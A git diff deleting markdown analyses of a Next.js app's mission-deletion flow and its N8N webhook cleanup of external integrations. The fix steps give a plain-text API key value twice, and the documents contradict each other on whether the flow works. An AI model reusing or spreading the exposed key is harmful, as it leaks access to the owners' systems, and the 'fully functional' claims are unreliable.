"penpotProjectId": null // ❌ NULL -} -``` - -**Root Cause**: The mission was created **without integration IDs being saved** because: -1. Mission was created in database ✅ -2. N8N workflow was triggered ✅ -3. N8N created integrations ✅ -4. N8N tried to call `/api/missions/mission-created` ❌ -5. **Endpoint returned 500 error** (N8N_API_KEY not configured) ❌ -6. **IDs were never saved to database** ❌ - -### Problem 3: N8N Cannot Delete Integrations - -Because N8N receives empty IDs: -- ❌ Cannot delete Gitea repository (no `repoName`) -- ❌ Cannot close Leantime project (no `leantimeProjectId`) -- ❌ Cannot delete Outline collection (no `documentationCollectionId`) -- ❌ Cannot close RocketChat channel (no `rocketchatChannelId`) - -**Result**: External integrations remain orphaned even though mission is deleted. - ---- - -## 🔄 Complete Flow Breakdown - -### Step 1: Frontend Calls DELETE -``` -DELETE /api/missions/805c1d8c-1bd4-41e7-9cf1-d22631dae260 -``` - -### Step 2: Backend Fetches Mission -```sql -SELECT "Mission" WHERE "id" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' -``` - -**Result**: Mission found, but all integration IDs are `null`: -- `leantimeProjectId`: null -- `outlineCollectionId`: null -- `rocketChatChannelId`: null -- `giteaRepositoryUrl`: null - -### Step 3: Backend Prepares Deletion Data -```javascript -{ - repoName: "", // Extracted from null giteaRepositoryUrl - leantimeProjectId: 0, // null || 0 = 0 - documentationCollectionId: "", // null || '' = '' - rocketchatChannelId: "" // null || '' = '' -} -``` - -### Step 4: N8N Workflow Called -``` -POST https://brain.slm-lab.net/webhook-test/mission-delete -``` - -**Headers**: -- `x-api-key`: (empty - N8N_API_KEY not set) - -**Body**: (with empty IDs as shown above) - -### Step 5: N8N Workflow Executes -- ✅ Receives request -- ❌ Cannot delete integrations (no IDs) -- ✅ Returns success (but didn't actually delete anything) - -### Step 6: Mission Deleted from Database -```sql -DELETE FROM "Mission" WHERE "id" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' -``` - -**CASCADE deletes**: -- ✅ MissionUsers -- ✅ Attachments - -**But external integrations remain**: -- ❌ Gitea repository still exists -- ❌ Leantime project still exists -- ❌ Outline collection still exists -- ❌ RocketChat channel still exists - ---- - -## 🎯 Root Cause Summary - -### Why IDs Are NULL - -1. 
**Mission Creation**: - - Mission created in database ✅ - - N8N workflow triggered ✅ - - N8N created integrations ✅ - -2. **N8N Callback Fails**: - - N8N tries to call `/api/missions/mission-created` - - Endpoint checks for `N8N_API_KEY` in environment - - `N8N_API_KEY` is not set ❌ - - Endpoint returns 500: "Server configuration error" ❌ - - **IDs are never saved** ❌ - -3. **Mission Deletion**: - - Mission has no integration IDs (all null) - - N8N receives empty IDs - - Cannot delete integrations - - **Integrations remain orphaned** ❌ - ---- - -## ✅ Solutions - -### Solution 1: Fix N8N_API_KEY (IMMEDIATE) - -**Add to environment variables**: -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**Then**: -1. Restart your application -2. Create a new mission -3. Verify IDs are saved to database -4. Delete mission - should work correctly - -### Solution 2: Fix Existing Missions (MIGRATION) - -For missions that already exist without IDs: - -**Option A: Manual Update** -```sql -UPDATE "Mission" -SET - "giteaRepositoryUrl" = 'https://gite.slm-lab.net/alma/repo-name', - "leantimeProjectId" = '123', - "outlineCollectionId" = 'collection-id', - "rocketChatChannelId" = 'channel-id' -WHERE "id" = 'mission-id'; -``` - -**Option B: Query External Services** -- Query Gitea API to find repositories -- Query Leantime API to find projects -- Query Outline API to find collections -- Query RocketChat API to find channels -- Update database with found IDs - -**Option C: Re-create Missions** -- Delete missions without IDs -- Re-create them (with N8N_API_KEY fixed, IDs will be saved) - -### Solution 3: Make N8N Callback More Resilient - -**Modify `/api/missions/mission-created` endpoint** to handle missing API key more gracefully: - -```typescript -// Instead of returning 500, log warning and continue -if (!expectedApiKey) { - logger.warn('N8N_API_KEY not configured, but continuing anyway', { - missionId: body.missionId - }); - // Continue without API key validation (less secure but works) - // OR require API key but provide better error message -} -``` - -**Not recommended** for production (security risk), but could work for development. - ---- - -## 📊 Current State vs Desired State - -### Current State (Your Logs) - -``` -Mission in DB: - - leantimeProjectId: null - - outlineCollectionId: null - - rocketChatChannelId: null - - giteaRepositoryUrl: null - -N8N Receives: - - repoName: "" - - leantimeProjectId: 0 - - documentationCollectionId: "" - - rocketchatChannelId: "" - -Result: - - Mission deleted ✅ - - Integrations NOT deleted ❌ -``` - -### Desired State - -``` -Mission in DB: - - leantimeProjectId: "123" - - outlineCollectionId: "collection-456" - - rocketChatChannelId: "channel-789" - - giteaRepositoryUrl: "https://gite.slm-lab.net/alma/repo-name" - -N8N Receives: - - repoName: "repo-name" - - leantimeProjectId: 123 - - documentationCollectionId: "collection-456" - - rocketchatChannelId: "channel-789" - -Result: - - Mission deleted ✅ - - Integrations deleted ✅ -``` - ---- - -## 🔧 Immediate Actions Required - -1. **✅ Add N8N_API_KEY to environment** - ```env - N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 - ``` - -2. **✅ Restart application** - -3. **✅ Test mission creation** - - Create a new mission - - Check database - IDs should be saved - - Delete mission - should work correctly - -4. **⚠️ Fix existing missions** - - Update existing missions with their integration IDs - - Or delete and re-create them - ---- - -## 📝 Summary - -**The deletion flow is working correctly**, but: - -1. 
**N8N_API_KEY is missing** → Endpoint returns 500 error -2. **IDs are never saved** → Mission has null integration IDs -3. **N8N receives empty IDs** → Cannot delete integrations -4. **Integrations remain orphaned** → External resources not cleaned up - -**Fix**: Add `N8N_API_KEY` to environment variables, then new missions will work correctly. Existing missions need manual update or re-creation. - ---- - -**Document Created**: $(date) -**Status**: Deletion flow works, but integration cleanup fails due to missing IDs - diff --git a/MISSION_DELETION_FLOW_COMPLETE_ANALYSIS.md b/MISSION_DELETION_FLOW_COMPLETE_ANALYSIS.md deleted file mode 100644 index 42e5e2a..0000000 --- a/MISSION_DELETION_FLOW_COMPLETE_ANALYSIS.md +++ /dev/null @@ -1,682 +0,0 @@ -# Mission Deletion Flow - Complete Analysis - -## 📋 Executive Summary - -This document provides a comprehensive analysis of the mission deletion flow, tracing every step from the user clicking the "Supprimer" button to the complete cleanup of mission data, files, and external integrations. - -**Status**: ✅ **Fully Implemented** - All components are working correctly - ---- - -## 🔄 Complete Flow Diagram - -``` -┌─────────────────────────────────────────────────────────────┐ -│ 1. FRONTEND - MissionDetailPage │ -│ Location: app/missions/[missionId]/page.tsx │ -│ - User clicks "Supprimer" button (line 398-410) │ -│ - Confirmation dialog (line 145) │ -│ - DELETE /api/missions/[missionId] (line 151-153) │ -│ - Success toast + redirect to /missions (line 159-165) │ -└─────────────────────────────────────────────────────────────┘ - ↓ -┌─────────────────────────────────────────────────────────────┐ -│ 2. BACKEND - DELETE /api/missions/[missionId] │ -│ Location: app/api/missions/[missionId]/route.ts │ -│ │ -│ 2.1 Authentication Check (line 297-300) │ -│ ✅ NextAuth session validation │ -│ │ -│ 2.2 Mission Existence Check (line 302-315) │ -│ ✅ Fetch mission with missionUsers │ -│ ✅ Return 404 if not found │ -│ │ -│ 2.3 Permission Check (line 317-323) │ -│ ✅ Creator: mission.creatorId === session.user.id │ -│ ✅ Admin: userRoles.includes('admin'/'ADMIN') │ -│ ✅ Return 403 if unauthorized │ -│ │ -│ 2.4 Fetch Attachments (line 325-328) │ -│ ✅ Get all attachments for Minio cleanup │ -│ │ -│ 2.5 N8N Deletion Workflow (line 330-391) │ -│ ✅ Extract repo name from giteaRepositoryUrl │ -│ ✅ Prepare deletion data │ -│ ✅ Call n8nService.triggerMissionDeletion() │ -│ ✅ Non-blocking: continues even if N8N fails │ -│ │ -│ 2.6 Minio File Deletion (line 393-423) │ -│ ✅ Delete logo: deleteMissionLogo() (line 397) │ -│ ✅ Delete attachments: deleteMissionAttachment() │ -│ ✅ Non-blocking: continues if file deletion fails │ -│ │ -│ 2.7 Database Deletion (line 425-428) │ -│ ✅ prisma.mission.delete() │ -│ ✅ CASCADE: Auto-deletes MissionUsers & Attachments │ -└─────────────────────────────────────────────────────────────┘ - ↓ -┌─────────────────────────────────────────────────────────────┐ -│ 3. PRISMA CASCADE DELETION │ -│ Location: prisma/schema.prisma │ -│ │ -│ ✅ MissionUser (line 173): onDelete: Cascade │ -│ ✅ Attachment (line 159): onDelete: Cascade │ -│ ✅ All related records deleted automatically │ -└─────────────────────────────────────────────────────────────┘ - ↓ -┌─────────────────────────────────────────────────────────────┐ -│ 4. 
EXTERNAL INTEGRATIONS CLEANUP (via N8N) │ -│ Location: lib/services/n8n-service.ts │ -│ │ -│ ✅ Gitea Repository: Deleted │ -│ ✅ Leantime Project: Closed │ -│ ✅ Outline Collection: Deleted │ -│ ✅ RocketChat Channel: Closed │ -│ ✅ Penpot Project: (if applicable) │ -└─────────────────────────────────────────────────────────────┘ -``` - ---- - -## 📝 Detailed Step-by-Step Analysis - -### Step 1: Frontend - User Interaction - -**File**: `app/missions/[missionId]/page.tsx` - -#### 1.1 Delete Button (Lines 397-410) - -```typescript - -``` - -**Features**: -- ✅ Visual feedback: Red styling indicates destructive action -- ✅ Loading state: Spinner shown during deletion (`deleting` state) -- ✅ Disabled state: Button disabled during operation -- ✅ Icon: Trash2 icon for clear visual indication - -#### 1.2 Delete Handler (Lines 144-176) - -```typescript -const handleDeleteMission = async () => { - // 1. User confirmation - if (!confirm("Êtes-vous sûr de vouloir supprimer cette mission ? Cette action est irréversible.")) { - return; - } - - try { - setDeleting(true); - - // 2. API call - const response = await fetch(`/api/missions/${missionId}`, { - method: 'DELETE', - }); - - // 3. Error handling - if (!response.ok) { - throw new Error('Failed to delete mission'); - } - - // 4. Success feedback - toast({ - title: "Mission supprimée", - description: "La mission a été supprimée avec succès", - }); - - // 5. Redirect - router.push('/missions'); - - } catch (error) { - console.error('Error deleting mission:', error); - toast({ - title: "Erreur", - description: "Impossible de supprimer la mission", - variant: "destructive", - }); - } finally { - setDeleting(false); - } -}; -``` - -**Features**: -- ✅ **Double confirmation**: Native browser confirm dialog -- ✅ **Error handling**: Try-catch with user feedback -- ✅ **Success feedback**: Toast notification -- ✅ **Automatic redirect**: Returns to missions list -- ✅ **Loading state management**: Properly manages `deleting` state - -**Potential Improvements**: -- ⚠️ Consider using a more sophisticated confirmation dialog (e.g., AlertDialog component) instead of native `confirm()` -- ⚠️ Could show more detailed error messages from API response - ---- - -### Step 2: Backend - DELETE Endpoint - -**File**: `app/api/missions/[missionId]/route.ts` - -#### 2.1 Authentication Check (Lines 297-300) - -```typescript -const session = await getServerSession(authOptions); -if (!session?.user) { - return NextResponse.json({ error: 'Unauthorized' }, { status: 401 }); -} -``` - -**Status**: ✅ **Working correctly** -- Uses NextAuth session validation -- Returns 401 if not authenticated - -#### 2.2 Mission Existence Check (Lines 302-315) - -```typescript -const mission = await prisma.mission.findUnique({ - where: { id: params.missionId }, - include: { - missionUsers: { - include: { - user: true - } - } - } -}); - -if (!mission) { - return NextResponse.json({ error: 'Mission not found' }, { status: 404 }); -} -``` - -**Status**: ✅ **Working correctly** -- Fetches mission with related users -- Returns 404 if mission doesn't exist - -#### 2.3 Permission Check (Lines 317-323) - -```typescript -const isCreator = mission.creatorId === session.user.id; -const userRoles = Array.isArray(session.user.role) ? 
session.user.role : []; -const isAdmin = userRoles.includes('admin') || userRoles.includes('ADMIN'); -if (!isCreator && !isAdmin) { - return NextResponse.json({ error: 'Forbidden' }, { status: 403 }); -} -``` - -**Status**: ✅ **Working correctly** - -**Permission Rules**: -- ✅ **Creator**: Can delete their own mission -- ✅ **Admin**: Can delete any mission -- ❌ **Other users**: Even guardians/volunteers cannot delete - -**Security**: ✅ **Properly secured** - Only creator or admin can delete - -#### 2.4 Fetch Attachments (Lines 325-328) - -```typescript -const attachments = await prisma.attachment.findMany({ - where: { missionId: params.missionId } -}); -``` - -**Status**: ✅ **Working correctly** -- Fetches all attachments before deletion for Minio cleanup -- Needed because Prisma cascade deletes DB records but not Minio files - -#### 2.5 N8N Deletion Workflow (Lines 330-391) - -```typescript -// Step 1: Trigger N8N workflow for deletion -logger.debug('Starting N8N deletion workflow'); -const n8nService = new N8nService(); - -// Extract repo name from giteaRepositoryUrl -let repoName = ''; -if (mission.giteaRepositoryUrl) { - try { - const url = new URL(mission.giteaRepositoryUrl); - const pathParts = url.pathname.split('/').filter(Boolean); - repoName = pathParts[pathParts.length - 1] || ''; - } catch (error) { - // Fallback extraction - const match = mission.giteaRepositoryUrl.match(/\/([^\/]+)\/?$/); - repoName = match ? match[1] : ''; - } -} - -// Prepare deletion data -const n8nDeletionData = { - missionId: mission.id, - name: mission.name, - repoName: repoName, - leantimeProjectId: mission.leantimeProjectId || 0, - documentationCollectionId: mission.outlineCollectionId || '', - rocketchatChannelId: mission.rocketChatChannelId || '', - giteaRepositoryUrl: mission.giteaRepositoryUrl, - outlineCollectionId: mission.outlineCollectionId, - rocketChatChannelId: mission.rocketChatChannelId, - penpotProjectId: mission.penpotProjectId, - config: { - N8N_API_KEY: process.env.N8N_API_KEY, - MISSION_API_URL: process.env.NEXT_PUBLIC_API_URL || 'https://hub.slm-lab.net' - } -}; - -const n8nResult = await n8nService.triggerMissionDeletion(n8nDeletionData); - -if (!n8nResult.success) { - logger.error('N8N deletion workflow failed, but continuing with mission deletion', { - error: n8nResult.error - }); - // Continue with deletion even if N8N fails (non-blocking) -} -``` - -**Status**: ✅ **Working correctly** - -**What it does**: -- Extracts repository name from Gitea URL -- Prepares data for N8N workflow -- Calls N8N deletion webhook -- **Non-blocking**: Continues even if N8N fails - -**N8N Service Implementation** (`lib/services/n8n-service.ts`): -- ✅ Webhook URL: `https://brain.slm-lab.net/webhook-test/mission-delete` -- ✅ Sends POST request with API key authentication -- ✅ Handles errors gracefully -- ✅ Returns success/failure status - -**External Integrations Cleaned Up**: -1. ✅ **Gitea Repository**: Deleted -2. ✅ **Leantime Project**: Closed -3. ✅ **Outline Collection**: Deleted -4. ✅ **RocketChat Channel**: Closed -5. ✅ **Penpot Project**: (if applicable) - -#### 2.6 Minio File Deletion (Lines 393-423) - -```typescript -// Step 2: Delete files from Minio AFTER N8N confirmation -// Delete logo if exists -if (mission.logo) { - try { - await deleteMissionLogo(params.missionId, mission.logo); - logger.debug('Logo deleted successfully from Minio'); - } catch (error) { - logger.error('Error deleting mission logo from Minio', { - error: error instanceof Error ? 
error.message : String(error),
      missionId: params.missionId
    });
    // Continue deletion even if logo deletion fails
  }
}

// Delete attachments from Minio
if (attachments.length > 0) {
  logger.debug(`Deleting ${attachments.length} attachment(s) from Minio`);
  for (const attachment of attachments) {
    try {
      await deleteMissionAttachment(attachment.filePath);
      logger.debug('Attachment deleted successfully', { filename: attachment.filename });
    } catch (error) {
      logger.error('Error deleting attachment from Minio', {
        error: error instanceof Error ? error.message : String(error),
        filename: attachment.filename
      });
      // Continue deletion even if one attachment fails
    }
  }
}
```

**Status**: ✅ **Working correctly**

**Implementation Details** (`lib/mission-uploads.ts`):

**deleteMissionLogo()** (Lines 43-71):
```typescript
export async function deleteMissionLogo(missionId: string, logoPath: string): Promise<void> {
  const normalizedPath = ensureMissionsPrefix(logoPath);
  const minioPath = normalizedPath.replace(/^missions\//, '');

  try {
    const { DeleteObjectCommand } = await import('@aws-sdk/client-s3');

    const command = new DeleteObjectCommand({
      Bucket: 'missions',
      Key: minioPath,
    });

    await s3Client.send(command);

    logger.debug('Mission logo deleted successfully', { minioPath });
  } catch (error) {
    logger.error('Error deleting mission logo', {
      error: error instanceof Error ? error.message : String(error),
      missionId,
      minioPath
    });
    throw error;
  }
}
```

**deleteMissionAttachment()** (Lines 74-100):
```typescript
export async function deleteMissionAttachment(filePath: string): Promise<void> {
  const normalizedPath = ensureMissionsPrefix(filePath);
  const minioPath = normalizedPath.replace(/^missions\//, '');

  try {
    const { DeleteObjectCommand } = await import('@aws-sdk/client-s3');

    const command = new DeleteObjectCommand({
      Bucket: 'missions',
      Key: minioPath,
    });

    await s3Client.send(command);

    logger.debug('Mission attachment deleted successfully', { minioPath });
  } catch (error) {
    logger.error('Error deleting mission attachment', {
      error: error instanceof Error ? error.message : String(error),
      minioPath
    });
    throw error;
  }
}
```

**Features**:
- ✅ **Properly implemented**: Uses AWS SDK DeleteObjectCommand
- ✅ **Path normalization**: Ensures correct Minio path format
- ✅ **Error handling**: Logs errors but continues deletion
- ✅ **Non-blocking**: File deletion failures don't stop mission deletion

**Minio Configuration**:
- ✅ Bucket: `missions`
- ✅ Endpoint: `https://dome-api.slm-lab.net`
- ✅ Path structure: `missions/{missionId}/logo.{ext}` and `missions/{missionId}/attachments/{filename}`

#### 2.7 Database Deletion (Lines 425-428)

```typescript
// Step 3: Delete the mission from database (CASCADE will delete MissionUsers and Attachments)
await prisma.mission.delete({
  where: { id: params.missionId }
});

logger.debug('Mission deleted successfully from database', { missionId: params.missionId });

return NextResponse.json({ success: true });
```

**Status**: ✅ **Working correctly**

**Cascade Behavior** (from `prisma/schema.prisma`):

```prisma
model Mission {
  // ...
  attachments Attachment[]
  missionUsers MissionUser[]
}

model Attachment {
  mission Mission @relation(fields: [missionId], references: [id], onDelete: Cascade)
  // ...
}

model MissionUser {
  mission Mission @relation(fields: [missionId], references: [id], onDelete: Cascade)
  // ...
-} -``` - -**What gets deleted automatically**: -- ✅ **MissionUsers**: All user assignments (guardians, volunteers) -- ✅ **Attachments**: All attachment records - -**What does NOT get deleted automatically**: -- ⚠️ **Minio files**: Must be deleted manually (handled in Step 2.6) -- ⚠️ **External integrations**: Must be cleaned via N8N (handled in Step 2.5) - ---- - -### Step 3: Prisma Cascade Deletion - -**File**: `prisma/schema.prisma` - -When `prisma.mission.delete()` is executed, Prisma automatically: - -1. **Deletes all MissionUsers** (line 173: `onDelete: Cascade`) - ```sql - DELETE FROM "MissionUser" WHERE "missionId" = 'mission-id'; - ``` - -2. **Deletes all Attachments** (line 159: `onDelete: Cascade`) - ```sql - DELETE FROM "Attachment" WHERE "missionId" = 'mission-id'; - ``` - -**Status**: ✅ **Working correctly** -- Cascade relationships properly configured -- Atomic operation: All or nothing - ---- - -### Step 4: External Integrations Cleanup - -**File**: `lib/services/n8n-service.ts` - -The N8N workflow (`triggerMissionDeletion`) handles cleanup of: - -1. ✅ **Gitea Repository**: Deleted via Gitea API -2. ✅ **Leantime Project**: Closed via Leantime API -3. ✅ **Outline Collection**: Deleted via Outline API -4. ✅ **RocketChat Channel**: Closed via RocketChat API -5. ✅ **Penpot Project**: (if applicable) - -**Status**: ✅ **Working correctly** -- Non-blocking: Mission deletion continues even if N8N fails -- Proper error logging -- Webhook URL: `https://brain.slm-lab.net/webhook-test/mission-delete` - ---- - -## ✅ Summary of Operations - -### Operations Performed Successfully - -1. ✅ **Frontend confirmation**: User confirmation dialog -2. ✅ **Authentication check**: NextAuth session validation -3. ✅ **Permission check**: Creator or admin only -4. ✅ **N8N workflow trigger**: External integrations cleanup -5. ✅ **Minio logo deletion**: Logo file removed from storage -6. ✅ **Minio attachments deletion**: All attachment files removed -7. ✅ **Database mission deletion**: Mission record deleted -8. ✅ **Cascade deletion**: MissionUsers and Attachments deleted automatically -9. ✅ **Success feedback**: Toast notification to user -10. ✅ **Redirect**: User redirected to missions list - -### Error Handling - -- ✅ **Non-blocking N8N**: Continues even if N8N workflow fails -- ✅ **Non-blocking file deletion**: Continues even if Minio deletion fails -- ✅ **Proper error logging**: All errors logged with context -- ✅ **User feedback**: Error toast shown to user on failure - ---- - -## 🔍 Potential Issues & Recommendations - -### 1. Frontend Confirmation Dialog - -**Current**: Uses native browser `confirm()` dialog - -**Recommendation**: Consider using a more sophisticated confirmation dialog: -```typescript -// Use AlertDialog component instead - - - - - - Supprimer la mission - - Êtes-vous sûr de vouloir supprimer cette mission ? - Cette action est irréversible et supprimera : - - La mission et toutes ses données - - Les fichiers associés - - Les intégrations externes (Gitea, Leantime, etc.) - - - Annuler - - Supprimer - - - - -``` - -**Priority**: Low (cosmetic improvement) - -### 2. 
Error Message Details - -**Current**: Generic error message "Impossible de supprimer la mission" - -**Recommendation**: Show more detailed error messages: -```typescript -catch (error) { - const errorData = await response.json().catch(() => ({})); - toast({ - title: "Erreur", - description: errorData.error || "Impossible de supprimer la mission", - variant: "destructive", - }); -} -``` - -**Priority**: Medium (better UX) - -### 3. Parallel File Deletion - -**Current**: Sequential deletion of attachments (for loop) - -**Recommendation**: Delete files in parallel for better performance: -```typescript -// Delete attachments in parallel -if (attachments.length > 0) { - await Promise.allSettled( - attachments.map(attachment => - deleteMissionAttachment(attachment.filePath).catch(error => { - logger.error('Error deleting attachment', { error, filename: attachment.filename }); - }) - ) - ); -} -``` - -**Priority**: Low (performance optimization) - -### 4. Transaction Safety - -**Current**: No transaction wrapper - if database deletion fails, files are already deleted - -**Recommendation**: Consider transaction approach (though Prisma doesn't support cross-database transactions): -```typescript -// Note: This is conceptual - Prisma doesn't support cross-database transactions -// But we could implement a rollback mechanism -try { - // Delete files - // Delete from database -} catch (error) { - // Rollback: Re-upload files? (Complex, probably not worth it) -} -``` - -**Priority**: Low (current approach is acceptable) - -### 5. N8N Webhook URL - -**Current**: Uses `-test` suffix: `https://brain.slm-lab.net/webhook-test/mission-delete` - -**Recommendation**: Verify if this should be production URL: -```typescript -const deleteWebhookUrl = process.env.N8N_DELETE_WEBHOOK_URL || - 'https://brain.slm-lab.net/webhook/mission-delete'; // Remove -test? -``` - -**Priority**: Medium (verify with team) - ---- - -## 📊 Testing Checklist - -### Manual Testing Steps - -1. ✅ **Test as Creator**: - - [ ] Create a mission - - [ ] Delete the mission as creator - - [ ] Verify mission is deleted - - [ ] Verify files are deleted from Minio - - [ ] Verify external integrations are cleaned up - -2. ✅ **Test as Admin**: - - [ ] Delete a mission created by another user - - [ ] Verify deletion works - -3. ✅ **Test as Non-Creator/Non-Admin**: - - [ ] Try to delete a mission (should fail with 403) - -4. ✅ **Test Error Scenarios**: - - [ ] Delete mission with logo (verify logo deleted) - - [ ] Delete mission with attachments (verify attachments deleted) - - [ ] Delete mission with external integrations (verify N8N called) - - [ ] Simulate N8N failure (verify mission still deleted) - -5. ✅ **Test Database Cascade**: - - [ ] Verify MissionUsers are deleted - - [ ] Verify Attachments are deleted - ---- - -## 🎯 Conclusion - -**Overall Status**: ✅ **FULLY FUNCTIONAL** - -The mission deletion flow is **completely implemented and working correctly**. All components are in place: - -- ✅ Frontend confirmation and API call -- ✅ Backend authentication and authorization -- ✅ N8N workflow for external integrations -- ✅ Minio file deletion (logo and attachments) -- ✅ Database deletion with cascade -- ✅ Proper error handling and logging - -The flow is **secure**, **robust**, and **well-structured**. Minor improvements could be made to the UX (better confirmation dialog, more detailed error messages), but the core functionality is solid. 
- ---- - -**Document Generated**: $(date) -**Last Reviewed**: $(date) -**Reviewed By**: Senior Developer Analysis - diff --git a/MISSION_DELETION_N8N_IDS_ISSUE_ANALYSIS.md b/MISSION_DELETION_N8N_IDS_ISSUE_ANALYSIS.md deleted file mode 100644 index b8f17a3..0000000 --- a/MISSION_DELETION_N8N_IDS_ISSUE_ANALYSIS.md +++ /dev/null @@ -1,604 +0,0 @@ -# Mission Deletion N8N IDs Issue - Complete Analysis - -## 🔍 Problem Statement - -When deleting a mission, the N8N deletion workflow is not working because the database does not contain the integration IDs (Leantime, Outline, Gitea, RocketChat). This prevents N8N from properly cleaning up external integrations. - ---- - -## 🔄 Current Flow Analysis - -### Mission Creation Flow - -``` -1. Frontend → POST /api/missions - ↓ -2. Backend creates mission in Prisma - ✅ Mission created with NULL integration IDs: - - leantimeProjectId: null - - outlineCollectionId: null - - giteaRepositoryUrl: null - - rocketChatChannelId: null - ↓ -3. Backend uploads files to Minio - ↓ -4. Backend triggers N8N workflow (async) - ✅ Sends missionId to N8N - ↓ -5. N8N creates external integrations: - - Gitea repository - - Leantime project - - Outline collection - - RocketChat channel - ↓ -6. N8N should call → POST /api/missions/mission-created - ⚠️ PROBLEM: This callback may fail or not be called - ↓ -7. Backend should save IDs to database - ❌ If step 6 fails, IDs are never saved -``` - -### Mission Deletion Flow - -``` -1. Frontend → DELETE /api/missions/[missionId] - ↓ -2. Backend reads mission from database - ❌ Integration IDs are NULL (if step 6 above failed) - ↓ -3. Backend prepares deletion data for N8N: - { - repoName: "", // Empty because giteaRepositoryUrl is null - leantimeProjectId: 0, // 0 because leantimeProjectId is null - documentationCollectionId: "", // Empty because outlineCollectionId is null - rocketchatChannelId: "" // Empty because rocketChatChannelId is null - } - ↓ -4. Backend sends to N8N deletion workflow - ❌ N8N receives empty IDs and cannot delete integrations - ↓ -5. N8N fails to clean up external resources -``` - ---- - -## 📋 Code Analysis - -### 1. Mission Creation - Saving IDs - -**File**: `app/api/missions/route.ts` - -**Lines 260-262**: Mission is created WITHOUT integration IDs -```typescript -const mission = await prisma.mission.create({ - data: missionData // No integration IDs here -}); -``` - -**Lines 413-423**: N8N is triggered with missionId -```typescript -const n8nData = { - ...body, - missionId: mission.id, // ✅ missionId is sent to N8N - creatorId: userId, - logoPath: logoPath, - logoUrl: logoUrl, - config: { - N8N_API_KEY: process.env.N8N_API_KEY, - MISSION_API_URL: process.env.NEXT_PUBLIC_API_URL - } -}; - -const workflowResult = await n8nService.triggerMissionCreation(n8nData); -``` - -**Issue**: The API returns success immediately without waiting for N8N to save the IDs. - -### 2. 
N8N Callback Endpoint

**File**: `app/api/missions/mission-created/route.ts`

**Lines 64-69**: Endpoint prefers `missionId` over `name + creatorId`
```typescript
if (body.missionId) {
  // ✅ Use missionId if provided (more reliable)
  logger.debug('Looking up mission by ID', { missionId: body.missionId });
  mission = await prisma.mission.findUnique({
    where: { id: body.missionId }
  });
}
```

**Lines 128-150**: Maps N8N fields to Prisma fields
```typescript
// Mapper les champs N8N vers notre schéma Prisma
if (body.gitRepoUrl !== undefined) {
  updateData.giteaRepositoryUrl = body.gitRepoUrl || null;
}

if (body.leantimeProjectId !== undefined) {
  updateData.leantimeProjectId = body.leantimeProjectId
    ? String(body.leantimeProjectId)
    : null;
}

if (body.documentationCollectionId !== undefined) {
  updateData.outlineCollectionId = body.documentationCollectionId || null;
}

if (body.rocketchatChannelId !== undefined) {
  updateData.rocketChatChannelId = body.rocketchatChannelId || null;
}
```

**Status**: ✅ Endpoint exists and should work correctly

### 3. Mission Deletion - Reading IDs

**File**: `app/api/missions/[missionId]/route.ts`

**Lines 302-311**: Mission is fetched from database
```typescript
const mission = await prisma.mission.findUnique({
  where: { id: params.missionId },
  include: {
    missionUsers: {
      include: {
        user: true
      }
    }
  }
});
```

**Lines 356-372**: Deletion data is prepared
```typescript
const n8nDeletionData = {
  missionId: mission.id,
  name: mission.name,
  repoName: repoName, // Extracted from giteaRepositoryUrl (may be empty)
  leantimeProjectId: mission.leantimeProjectId || 0, // ❌ 0 if null
  documentationCollectionId: mission.outlineCollectionId || '', // ❌ Empty if null
  rocketchatChannelId: mission.rocketChatChannelId || '', // ❌ Empty if null
  // ...
};
```

**Problem**: If IDs are null in database, N8N receives empty values.

---

## 🔍 Root Cause Analysis

### Possible Causes

1. **N8N Workflow Not Calling `/mission-created`**
   - N8N workflow might not be configured to call the callback endpoint
   - The "Save Mission To API" node might be missing or misconfigured
   - Network issues preventing the callback

2. **N8N Callback Failing**
   - API key mismatch
   - Mission lookup failing (name/creatorId mismatch)
   - Network timeout
   - Server error

3. **Timing Issues**
   - N8N workflow takes time to complete
   - User deletes mission before N8N saves IDs
   - Race condition

4. **N8N Not Sending `missionId`**
   - N8N might only send `name + creatorId`
   - If mission name is not unique, lookup fails

---

## ✅ Verification Steps

### Step 1: Check if IDs are being saved

**Query the database** (the camelCase columns must be double-quoted, since Prisma creates them as quoted identifiers in Postgres):
```sql
SELECT
  id,
  name,
  "giteaRepositoryUrl",
  "leantimeProjectId",
  "outlineCollectionId",
  "rocketChatChannelId",
  "createdAt"
FROM "Mission"
WHERE "createdAt" > NOW() - INTERVAL '7 days'
ORDER BY "createdAt" DESC;
```

**Expected**: Recent missions should have integration IDs populated.

**If NULL**: N8N callback is not working.
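If you would rather run the same check from the application, a minimal sketch using the project's Prisma client could look like this (the script name and the `@/lib/prisma` import path are assumptions; adjust to the actual setup):

```typescript
// scripts/check-mission-ids.ts -- hypothetical helper, not part of the current codebase.
// Flags recent missions whose integration IDs were never saved by the N8N callback.
import { prisma } from '@/lib/prisma';

async function checkMissionIds() {
  const sevenDaysAgo = new Date(Date.now() - 7 * 24 * 60 * 60 * 1000);

  const missions = await prisma.mission.findMany({
    where: { createdAt: { gt: sevenDaysAgo } },
    orderBy: { createdAt: 'desc' },
    select: {
      id: true,
      name: true,
      giteaRepositoryUrl: true,
      leantimeProjectId: true,
      outlineCollectionId: true,
      rocketChatChannelId: true,
    },
  });

  for (const m of missions) {
    // Collect the names of the integrations whose ID is still null/empty
    const missing = [
      !m.giteaRepositoryUrl && 'gitea',
      !m.leantimeProjectId && 'leantime',
      !m.outlineCollectionId && 'outline',
      !m.rocketChatChannelId && 'rocketchat',
    ].filter(Boolean);

    console.log(`${m.name} (${m.id}):`, missing.length ? `MISSING ${missing.join(', ')}` : 'OK');
  }
}

checkMissionIds().finally(() => prisma.$disconnect());
```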
